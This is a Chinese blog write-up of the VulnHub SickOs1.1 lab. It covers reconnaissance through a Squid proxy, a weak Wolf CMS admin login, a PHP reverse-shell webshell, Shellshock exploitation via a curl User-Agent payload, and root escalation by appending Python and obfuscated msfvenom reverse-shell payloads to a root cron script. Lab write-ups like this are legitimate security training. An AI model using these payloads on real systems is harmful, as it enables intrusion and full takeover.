SickOs1.1靶机

已于 2023-12-11 20:10:24 修改
阅读量236 收藏
点赞数 7
文章标签: linux 网络 运维
于 2023-12-11 18:15:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80203701/article/details/134923815
版权

靶机地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

目录

解法一

环境配置:

信息收集

主机探测 

端口扫描 

Script漏洞扫描

 TCP扫描

 UDP扫描

端口利用查找

 漏洞查找

网页后台扫描

webshell 

getshell

解法二

Shellshock利用

 提权

解法一

环境配置:

kali和SickOs1.1都设置为NAT模式

两个都是可以的,个人比较喜欢第二种。

信息收集

主机探测 

 本机IP为192.168.234.152,扫描这个c段。

端口扫描 

sudo nmap -sV -O -p- --min-rate 10000 192.168.234.144 -oA nmapscan/ports

参数解释:

-sV                                              探测目标对象开放的服务

-O                                               探测目标对象的操作系统

-p-                                               探测目标开放的所有端口

--min-rate  10000                        以10000的速率进行扫描到的

-oA                                              将结果全格式的保存到ports中

可以看到开放了 22,3128,8080端口。保存下来

Script漏洞扫描

sudo nmap --script=vuln -p22,3128,8080 --min-rate 10000 192.168.234.144 -oA nmapscan/vuln

爆出来个Dos,一般的渗透测试中不用这种损人的漏洞。

 TCP扫描

sudo nmap -sT -T 4 192.168.234.144 -oA nmapscan/tcp

也没扫出来什么有用的端口,但是该进行的扫描是必须要进行的,万一哪次就是突破口呢。

 UDP扫描

sudo nmap -sU -p22,3128,8080 192.168.234.144 -oA nmapscan/udp

也没扫出来什么有用的端口。

端口利用查找

再次提示我们 Squid http proxy 3.1.19,很可能这就是突破口。

 漏洞查找

网页后台扫描

sudo dirsearch -u http://192.168.234.144 --proxy http://192.168.234.144:3128 -x403

挂上代理后可以正常扫描了,有个robots.txt访问一下。

  

不知道为什么proxy这个插件不管用了。 

两个代理全部给挂上,访问robots.txt。 

有个wolfcms,记着,接着访问login页面。

没什么用。 

好像也没什么用。

那就打开wolfcms这个后台试试看, 

打开了,随便点点看。 点了半天也没个上传点,那就搜一下这个cms。或许找找他管理页面。

找到了,就看看登录界面。 

现在就是找找怎么进入这个登录页面。 

刚开始无意的输入一个弱口令就进去,账号:admin 密码:admin。有点没话说。

现在就是寻找上传点, webshell

这个可以执行,php代码,那就开始反弹shell吧,

webshell 

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.234.152/443 0>&1'");?>

点击保存,现在kali中开启监听端口。

getshell

然后点击Articles这个页面。 

这里反弹上来了。 

可以让我们执行clear这个命令。

网站的配置文件,打开看看。 

有点乱,看看有什么可以执行的命令打开这个文件。

用vi打开可以看到有个sql的账户密码。但是又没开放3306端口利用不了,万一别的用户也可以用这个密码登录呢,那就看看所有的用户。

那就一个一个试试吧,

上来了 ,那就看看这个用户有什么权限。

具有所有权限, 那就用sudo新开一个bash环境。

得到flag! 

解法二

主机探测的和解法一样的,用Nikto扫描下。

sudo nikto -h 192.168.234.144 --useproxy http://192.168.234.144:3128

                                                                                                           
┌──(kali㉿kali)-[~/baji/SickOs]
└─$ sudo nikto -h 192.168.234.144 -useproxy http://192.168.234.144:3128 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.234.144
+ Target Hostname:    192.168.234.144
+ Target Port:        80
+ Proxy:              192.168.234.144:3128
+ Start Time:         2023-12-11 05:28:31 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Retrieved via header: 1.0 localhost (squid/3.1.19).
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec  4 19:35:02 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ : Server banner changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19'.
+ /: Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /cgi-bin/status: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8913 requests: 3 error(s) and 20 item(s) reported on remote host
+ End Time:           2023-12-11 05:30:41 (GMT-5) (130 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

有个/cgi-bin/status漏洞,百度一下。是个Bash 破壳漏洞Shellshock (CVE-2014-6271)。

Shellshock利用

需要我们自行构造User-Agent

sudo curl -v --proxy http://192.168.234.144:3128 http://192.168.234.144/cgi-bin/status -H "User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.234.152/4443 0>&1;"

()和{:;}的意思是不进行任何操作,只是返回一个零的退出状态.

 

成功反弹。

 提权

先用python建立一个可靠的连接。看看是否下载了python,用命令 dpkg -l。

有,那就用pyhon建立稳定的shell。

python -c 'import pty;pty.spawn("/bin/bash")'

进入到网站根目录,发现到一个connect.py文件,打开看看

暗示我们有定时任务,那就cat一下看看。

cat /etc/crontab
www-data@SickOs:/var/www$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

什么都没有,换一个看看,那就直接进入/etc的目录下找 cron.d这个文件。

www-data@SickOs:/etc$ ls -la cron.d
ls -la cron.d
total 20
drwxr-xr-x  2 root root 4096 Dec  5  2015 .
drwxr-xr-x 90 root root 4096 Dec  9  2023 ..
-rw-r--r--  1 root root  102 Jun 20  2012 .placeholder
-rw-r--r--  1 root root   52 Dec  5  2015 automate
-rw-r--r--  1 root root  544 Jul  2  2015 php5
www-data@SickOs:/etc$ cd /cron.d
cd /cron.d
bash: cd: /cron.d: No such file or directory
www-data@SickOs:/etc$ cd cron.d
cd cron.d
www-data@SickOs:/etc/cron.d$ ls
ls
automate  php5
www-data@SickOs:/etc/cron.d$ cat automate
cat automate

* * * * * root /usr/bin/python /var/www/connect.py
www-data@SickOs:/etc/cron.d$

重点是最后一句  root /usr/bin/python /var/www/connect.py 以root用户执行那个connect.py脚本,思路就很清晰了,百度一个python提权脚本。

  贴个连接:https://www.cnblogs.com/soulblog/p/15586775.html

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.234.152",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 想办法把这个脚本替换connect.py。

 转到/var/www目录下。因为有#/usr/bin/python了我们只需要将引号里面的内容追到到这个定时脚本里面。

www-data@SickOs:/var/www$ ls
ls
connect.py  index.php  robots.txt  wolfcms
www-data@SickOs:/var/www$ echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.234.152",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);" >> connect.py
sh","-i"]);" >> connect.py(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/ 
www-data@SickOs:/var/www$ cat connect.py
cat connect.py
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.234.152,4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([/bin/sh,-i]);
www-data@SickOs:/var/www$

静静的等着吧~

这里应该是端口占用了,直接用msfvenom换一个端口吧。

┌──(kali㉿kali)-[~]
└─$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.234.152 lport=4449 -f raw
[sudo] password for kali: 
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 364 bytes
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkMEKwjAMhl+l9NSBRFerOKSHIRNEVHC7D1crG861LN37a+mGx+WQ8Cdf8kOajzW9I2jUWzuyIL/AobK9URoxaIM+7wmpDTpJ44RDvN0BXwuIN5yOQ39GCiGSUaMMNyEUNqr0WJ6uWTE6hV5+O5zLvLhn6SWatkGZrtPKMeZdA+4tookwCM/BcobwalrdGRYFaDUHxHMAnwAr/68A9WhbRpdV0y2xptEXCIxV8w==')[0])))"

www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkF8LgjAUxb+K+DQhrjlXFLEHCYOICtJ3ybVQMje88/uX+Wc9upede/a758DKt1aNcVCJlzTOcBYOtrlulJCI1lNfvfvpQqHhbrClEKw3QEMGwYq642sXyBlj4Wgg7+Ohv8gwRYfseInTv9LeT677U5aktzg6e1MECFXXUhhCunK705V5E6YQHq2mBOFZVrJWxLPkchYVzKLoRGluvwrEvaqI6+dl7WPheh8ldFpt')[0])))" >> connect.py
<kchYVzKLoRGluvwrEvaqI6+dl7WPheh8ldFpt')[0])))" >> connect.py                
www-data@SickOs:/var/www$ cat connect.py
cat connect.py
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkF8LgjAUxb+K+DQhrjlXFLEHCYOICtJ3ybVQMje88/uX+Wc9upede/a758DKt1aNcVCJlzTOcBYOtrlulJCI1lNfvfvpQqHhbrClEKw3QEMGwYq642sXyBlj4Wgg7+Ohv8gwRYfseInTv9LeT677U5aktzg6e1MECFXXUhhCunK705V5E6YQHq2mBOFZVrJWxLPkchYVzKLoRGluvwrEvaqI6+dl7WPheh8ldFpt')[0])))
www-data@SickOs:/var/www$

 这里要注意一下是两个 >> 号 追加内容。

┌──(root㉿kali)-[~]
└─# nc -lvvp 4443
listening on [any] 4443 ...
192.168.234.160: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.160] 32874
ls
a0216ea4d51874464078c618298b1367.txt
whoami
root
cd /root
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


ifconfig
/bin/sh: 5: ifconfig: not found
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever                                                                                                                           
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000                                                                             
    link/ether 00:0c:29:19:ec:fa brd ff:ff:ff:ff:ff:ff                                                                                                                   
    inet 192.168.234.160/24 brd 192.168.234.255 scope global eth0                                                                                                        
       valid_lft forever preferred_lft forever                                                                                                                           
    inet6 fe80::20c:29ff:fe19:ecfa/64 scope link                                                                                                                         
       valid_lft forever preferred_lft forever

可以看到成功了。 (之前那个玩崩了,又重新下载了一个才得以成功。)

至此结束!

 

Sunhaom1
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub系列-sick0s1.1
Yasso的博客
01-01 3405
靶机:192.168.12.130 kali: 192.168.249.128 一、信息收集 nmap -sV 192.168.12.130 –扫描开放端口 3128端口是作为代理 dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录 扫到robots.txt Wolf CMS 后台管理:?/admin 一试就出来了–弱口令:admin/admin Wolfcms 0.8.2中存在任意文件上传漏洞 weevely是适用
靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2398
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
vulnHub-sick0s1.1学习 两种解法
m0_50431798的博客
06-07 1338
查看cat /etc/shadow说是权限不足,那就提权,使用sudo -l查看权限,全all,那就可以使用sudo su提权,提权后再查看/etc/shadow文件。通过这个可以确定用户名大概率是admin,但是密码不清楚,那就尝试弱口令,弱口令不可以就进行爆破,不过这个尝试5次失败就会禁止30秒,可以通过其他方式进行绕过。使用dirsearch扫描可以看到/index.php/login/ ,一个登录链接。查看passwd表可以看到有/bin/bash的用户有root,sickos
VulnHub-sick0s1.1-靶机渗透学习
嗯嗯呐的博客
12-06 680
靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并在其上获得管理/根目录特权。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshell提权利用shellshock获得shell总结 信息收集 Nmap 扫描靶机端口 nmap扫描靶机
vulnhub靶机渗透 sick0s1.1
RestoreJustice的博客
03-19 220
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。木马所在的public录入前面扫描时已经扫到,所以木马位置为http://192.168.110.132/wolfcms/试着访问http://192.168.110.132/,发现无法访问。查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权。/test.php,使用蚁剑连接,记得挂上靶机的3128代理。
红队打靶:SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub)
Bossfrank的博客
06-08 697
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
【vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 409
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1153
这次的靶机是Vulnhub靶机靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 提权 总结
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7145
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
【vulnhub】SickOs1.2 靶机
Nicky_Zheng的博客
01-29 546
1、 信息收集 1.1、主机发现 使用netdiscover扫描靶机ip kali@kali:~$ sudo netdiscover -i eth1 6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360 _____________________________________________________________________________ IP At M
红队打靶:SickOS1.1详细打靶思路(vulnhub)
Bossfrank的博客
06-07 1477
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
渗透测试靶机----Sickos1.1
最新发布
久恙502的博客
01-19 772
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
靶机渗透之SICKOS: 1.1
qi_qi14的博客
07-11 409
常见弱口令:admin、password、root、toor、administer、123456、123123等等。利用sudo /bin/bash 切换为root用户,在root目录下找到flag。经过对比,找出目标靶机的IP地址为192.168.133.139。这里使用搜索引擎来试着找到该系统的admin登录入口。点击修改过的页面的同时,kali返回监听。查看靶机用户,并选择进行尝试ssh登录。8080端口-为网站代理,关闭状态。使用3128端口作为代理,重新扫描。22端口、3128端口为打开状态。
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 279
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
靶机渗透练习38-SickOs1
hirak0的博客
04-18 899
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ Description About Release Name........: SickOs1.1 Date Release: 11 Dec 2015 Author......: D4rk Series......: SickOs Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt Tester(s)...: h1tch1 Tw
Vulnhub 靶机 SickOs1.1 write up 配置squid代理,wolfcms getshell sudo提权
YouthBelief的博客
01-03 3832
0x00 环境准备 下载链接 https://download.vulnhub.com/sickos/sick0s1.1.7z 运行环境 Vmware 目标 root + flag 0x01 信息收集 靶机IP探测 nmap -sP 192.168.157.0/24 端口服务探测 nmap -sC -sV -A -p- 192.168.157.169 -o port.txt 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt
Vulnhub靶机SICKOS_ 1.1
LainWith的博客
12-09 678
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
VulnHub-sick0s1.2-靶机渗透学习
嗯嗯呐的博客
12-08 843
靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ 靶机难度:中级(CTF) 靶机描述:这是SickOs的后续系列中的第二篇,并且与先前的发行版无关,挑战范围是在系统上获得最高特权。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshellPHP一句话木马获得shell利用MSF获得shell提权手工提权MSF提权总结 信息收集 nmap扫描确定靶机地址 nmap扫描端口 -sS 半端口扫描 -sV 扫描出对应程序的版
vulhub——SickOs: 1.1
战神/calmness的博客
06-04 478
下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 目标机器地址:192.168.243.137 攻击机器地址:192.168.18.148 目录 信息收集 扫描 设置代理 wolfcms 上传木马 并且 访问 SSH登录 sudo提权 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt..
vulnhub靶机系列:
09-09
3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值